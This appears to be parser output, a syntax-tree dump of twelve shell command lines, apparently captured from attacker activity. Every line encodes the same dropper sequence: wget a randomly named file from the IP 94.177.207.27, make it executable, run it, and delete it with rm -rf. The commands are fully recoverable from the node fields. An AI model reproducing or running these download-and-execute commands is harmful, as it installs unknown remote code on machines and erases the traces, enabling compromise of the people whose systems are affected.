ListNode(lineno=2, pos=(12, 102), parts=[
  CommandNode(lineno=2, pos=(12, 48), parts=[
    WordNode(lineno=2, pos=(12, 16), word='wget'),
    WordNode(lineno=2, pos=(17, 48), word='http://94.177.207.27/M2HrBpz47j'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(48, 49)),
  CommandNode(lineno=2, pos=(50, 69), parts=[
    WordNode(lineno=2, pos=(50, 55), word='chmod'),
    WordNode(lineno=2, pos=(56, 58), word='+x'),
    WordNode(lineno=2, pos=(59, 69), word='M2HrBpz47j'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(69, 70)),
  CommandNode(lineno=2, pos=(71, 83), parts=[
    WordNode(lineno=2, pos=(71, 83), word='./M2HrBpz47j'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(83, 84)),
  CommandNode(lineno=2, pos=(85, 102), parts=[
    WordNode(lineno=2, pos=(85, 87), word='rm'),
    WordNode(lineno=2, pos=(88, 91), word='-rf'),
    WordNode(lineno=2, pos=(92, 102), word='M2HrBpz47j'),
  ]),
])
ListNode(lineno=3, pos=(103, 193), parts=[
  CommandNode(lineno=3, pos=(103, 139), parts=[
    WordNode(lineno=3, pos=(103, 107), word='wget'),
    WordNode(lineno=3, pos=(108, 139), word='http://94.177.207.27/eCzhSya38p'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(139, 140)),
  CommandNode(lineno=3, pos=(141, 160), parts=[
    WordNode(lineno=3, pos=(141, 146), word='chmod'),
    WordNode(lineno=3, pos=(147, 149), word='+x'),
    WordNode(lineno=3, pos=(150, 160), word='eCzhSya38p'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(160, 161)),
  CommandNode(lineno=3, pos=(162, 174), parts=[
    WordNode(lineno=3, pos=(162, 174), word='./eCzhSya38p'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(174, 175)),
  CommandNode(lineno=3, pos=(176, 193), parts=[
    WordNode(lineno=3, pos=(176, 178), word='rm'),
    WordNode(lineno=3, pos=(179, 182), word='-rf'),
    WordNode(lineno=3, pos=(183, 193), word='eCzhSya38p'),
  ]),
])
ListNode(lineno=4, pos=(194, 284), parts=[
  CommandNode(lineno=4, pos=(194, 230), parts=[
    WordNode(lineno=4, pos=(194, 198), word='wget'),
    WordNode(lineno=4, pos=(199, 230), word='http://94.177.207.27/4K2aq9DVt3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(230, 231)),
  CommandNode(lineno=4, pos=(232, 251), parts=[
    WordNode(lineno=4, pos=(232, 237), word='chmod'),
    WordNode(lineno=4, pos=(238, 240), word='+x'),
    WordNode(lineno=4, pos=(241, 251), word='4K2aq9DVt3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(251, 252)),
  CommandNode(lineno=4, pos=(253, 265), parts=[
    WordNode(lineno=4, pos=(253, 265), word='./4K2aq9DVt3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(265, 266)),
  CommandNode(lineno=4, pos=(267, 284), parts=[
    WordNode(lineno=4, pos=(267, 269), word='rm'),
    WordNode(lineno=4, pos=(270, 273), word='-rf'),
    WordNode(lineno=4, pos=(274, 284), word='4K2aq9DVt3'),
  ]),
])
ListNode(lineno=5, pos=(285, 375), parts=[
  CommandNode(lineno=5, pos=(285, 321), parts=[
    WordNode(lineno=5, pos=(285, 289), word='wget'),
    WordNode(lineno=5, pos=(290, 321), word='http://94.177.207.27/9jZzRzXfnK'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(321, 322)),
  CommandNode(lineno=5, pos=(323, 342), parts=[
    WordNode(lineno=5, pos=(323, 328), word='chmod'),
    WordNode(lineno=5, pos=(329, 331), word='+x'),
    WordNode(lineno=5, pos=(332, 342), word='9jZzRzXfnK'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(342, 343)),
  CommandNode(lineno=5, pos=(344, 356), parts=[
    WordNode(lineno=5, pos=(344, 356), word='./9jZzRzXfnK'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(356, 357)),
  CommandNode(lineno=5, pos=(358, 375), parts=[
    WordNode(lineno=5, pos=(358, 360), word='rm'),
    WordNode(lineno=5, pos=(361, 364), word='-rf'),
    WordNode(lineno=5, pos=(365, 375), word='9jZzRzXfnK'),
  ]),
])
ListNode(lineno=6, pos=(376, 466), parts=[
  CommandNode(lineno=6, pos=(376, 412), parts=[
    WordNode(lineno=6, pos=(376, 380), word='wget'),
    WordNode(lineno=6, pos=(381, 412), word='http://94.177.207.27/ZKW9tLgzc8'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(412, 413)),
  CommandNode(lineno=6, pos=(414, 433), parts=[
    WordNode(lineno=6, pos=(414, 419), word='chmod'),
    WordNode(lineno=6, pos=(420, 422), word='+x'),
    WordNode(lineno=6, pos=(423, 433), word='ZKW9tLgzc8'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(433, 434)),
  CommandNode(lineno=6, pos=(435, 447), parts=[
    WordNode(lineno=6, pos=(435, 447), word='./ZKW9tLgzc8'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(447, 448)),
  CommandNode(lineno=6, pos=(449, 466), parts=[
    WordNode(lineno=6, pos=(449, 451), word='rm'),
    WordNode(lineno=6, pos=(452, 455), word='-rf'),
    WordNode(lineno=6, pos=(456, 466), word='ZKW9tLgzc8'),
  ]),
])
ListNode(lineno=7, pos=(467, 557), parts=[
  CommandNode(lineno=7, pos=(467, 503), parts=[
    WordNode(lineno=7, pos=(467, 471), word='wget'),
    WordNode(lineno=7, pos=(472, 503), word='http://94.177.207.27/VYXp6gEhqM'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(503, 504)),
  CommandNode(lineno=7, pos=(505, 524), parts=[
    WordNode(lineno=7, pos=(505, 510), word='chmod'),
    WordNode(lineno=7, pos=(511, 513), word='+x'),
    WordNode(lineno=7, pos=(514, 524), word='VYXp6gEhqM'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(524, 525)),
  CommandNode(lineno=7, pos=(526, 538), parts=[
    WordNode(lineno=7, pos=(526, 538), word='./VYXp6gEhqM'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(538, 539)),
  CommandNode(lineno=7, pos=(540, 557), parts=[
    WordNode(lineno=7, pos=(540, 542), word='rm'),
    WordNode(lineno=7, pos=(543, 546), word='-rf'),
    WordNode(lineno=7, pos=(547, 557), word='VYXp6gEhqM'),
  ]),
])
ListNode(lineno=8, pos=(558, 648), parts=[
  CommandNode(lineno=8, pos=(558, 594), parts=[
    WordNode(lineno=8, pos=(558, 562), word='wget'),
    WordNode(lineno=8, pos=(563, 594), word='http://94.177.207.27/cMb7LZDm2h'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(594, 595)),
  CommandNode(lineno=8, pos=(596, 615), parts=[
    WordNode(lineno=8, pos=(596, 601), word='chmod'),
    WordNode(lineno=8, pos=(602, 604), word='+x'),
    WordNode(lineno=8, pos=(605, 615), word='cMb7LZDm2h'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(615, 616)),
  CommandNode(lineno=8, pos=(617, 629), parts=[
    WordNode(lineno=8, pos=(617, 629), word='./cMb7LZDm2h'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(629, 630)),
  CommandNode(lineno=8, pos=(631, 648), parts=[
    WordNode(lineno=8, pos=(631, 633), word='rm'),
    WordNode(lineno=8, pos=(634, 637), word='-rf'),
    WordNode(lineno=8, pos=(638, 648), word='cMb7LZDm2h'),
  ]),
])
ListNode(lineno=9, pos=(649, 739), parts=[
  CommandNode(lineno=9, pos=(649, 685), parts=[
    WordNode(lineno=9, pos=(649, 653), word='wget'),
    WordNode(lineno=9, pos=(654, 685), word='http://94.177.207.27/cwqGUFAW6m'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(685, 686)),
  CommandNode(lineno=9, pos=(687, 706), parts=[
    WordNode(lineno=9, pos=(687, 692), word='chmod'),
    WordNode(lineno=9, pos=(693, 695), word='+x'),
    WordNode(lineno=9, pos=(696, 706), word='cwqGUFAW6m'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(706, 707)),
  CommandNode(lineno=9, pos=(708, 720), parts=[
    WordNode(lineno=9, pos=(708, 720), word='./cwqGUFAW6m'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(720, 721)),
  CommandNode(lineno=9, pos=(722, 739), parts=[
    WordNode(lineno=9, pos=(722, 724), word='rm'),
    WordNode(lineno=9, pos=(725, 728), word='-rf'),
    WordNode(lineno=9, pos=(729, 739), word='cwqGUFAW6m'),
  ]),
])
ListNode(lineno=10, pos=(740, 830), parts=[
  CommandNode(lineno=10, pos=(740, 776), parts=[
    WordNode(lineno=10, pos=(740, 744), word='wget'),
    WordNode(lineno=10, pos=(745, 776), word='http://94.177.207.27/7WRyJBjpbX'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(776, 777)),
  CommandNode(lineno=10, pos=(778, 797), parts=[
    WordNode(lineno=10, pos=(778, 783), word='chmod'),
    WordNode(lineno=10, pos=(784, 786), word='+x'),
    WordNode(lineno=10, pos=(787, 797), word='7WRyJBjpbX'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(797, 798)),
  CommandNode(lineno=10, pos=(799, 811), parts=[
    WordNode(lineno=10, pos=(799, 811), word='./7WRyJBjpbX'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(811, 812)),
  CommandNode(lineno=10, pos=(813, 830), parts=[
    WordNode(lineno=10, pos=(813, 815), word='rm'),
    WordNode(lineno=10, pos=(816, 819), word='-rf'),
    WordNode(lineno=10, pos=(820, 830), word='7WRyJBjpbX'),
  ]),
])
ListNode(lineno=11, pos=(831, 921), parts=[
  CommandNode(lineno=11, pos=(831, 867), parts=[
    WordNode(lineno=11, pos=(831, 835), word='wget'),
    WordNode(lineno=11, pos=(836, 867), word='http://94.177.207.27/rVt5ns7JfP'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(867, 868)),
  CommandNode(lineno=11, pos=(869, 888), parts=[
    WordNode(lineno=11, pos=(869, 874), word='chmod'),
    WordNode(lineno=11, pos=(875, 877), word='+x'),
    WordNode(lineno=11, pos=(878, 888), word='rVt5ns7JfP'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(888, 889)),
  CommandNode(lineno=11, pos=(890, 902), parts=[
    WordNode(lineno=11, pos=(890, 902), word='./rVt5ns7JfP'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(902, 903)),
  CommandNode(lineno=11, pos=(904, 921), parts=[
    WordNode(lineno=11, pos=(904, 906), word='rm'),
    WordNode(lineno=11, pos=(907, 910), word='-rf'),
    WordNode(lineno=11, pos=(911, 921), word='rVt5ns7JfP'),
  ]),
])
ListNode(lineno=12, pos=(922, 1012), parts=[
  CommandNode(lineno=12, pos=(922, 958), parts=[
    WordNode(lineno=12, pos=(922, 926), word='wget'),
    WordNode(lineno=12, pos=(927, 958), word='http://94.177.207.27/tNXgS89NFj'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(958, 959)),
  CommandNode(lineno=12, pos=(960, 979), parts=[
    WordNode(lineno=12, pos=(960, 965), word='chmod'),
    WordNode(lineno=12, pos=(966, 968), word='+x'),
    WordNode(lineno=12, pos=(969, 979), word='tNXgS89NFj'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(979, 980)),
  CommandNode(lineno=12, pos=(981, 993), parts=[
    WordNode(lineno=12, pos=(981, 993), word='./tNXgS89NFj'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(993, 994)),
  CommandNode(lineno=12, pos=(995, 1012), parts=[
    WordNode(lineno=12, pos=(995, 997), word='rm'),
    WordNode(lineno=12, pos=(998, 1001), word='-rf'),
    WordNode(lineno=12, pos=(1002, 1012), word='tNXgS89NFj'),
  ]),
])
ListNode(lineno=13, pos=(1013, 1103), parts=[
  CommandNode(lineno=13, pos=(1013, 1049), parts=[
    WordNode(lineno=13, pos=(1013, 1017), word='wget'),
    WordNode(lineno=13, pos=(1018, 1049), word='http://94.177.207.27/8jYckVBU5j'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1049, 1050)),
  CommandNode(lineno=13, pos=(1051, 1070), parts=[
    WordNode(lineno=13, pos=(1051, 1056), word='chmod'),
    WordNode(lineno=13, pos=(1057, 1059), word='+x'),
    WordNode(lineno=13, pos=(1060, 1070), word='8jYckVBU5j'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1070, 1071)),
  CommandNode(lineno=13, pos=(1072, 1084), parts=[
    WordNode(lineno=13, pos=(1072, 1084), word='./8jYckVBU5j'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1084, 1085)),
  CommandNode(lineno=13, pos=(1086, 1103), parts=[
    WordNode(lineno=13, pos=(1086, 1088), word='rm'),
    WordNode(lineno=13, pos=(1089, 1092), word='-rf'),
    WordNode(lineno=13, pos=(1093, 1103), word='8jYckVBU5j'),
  ]),
])
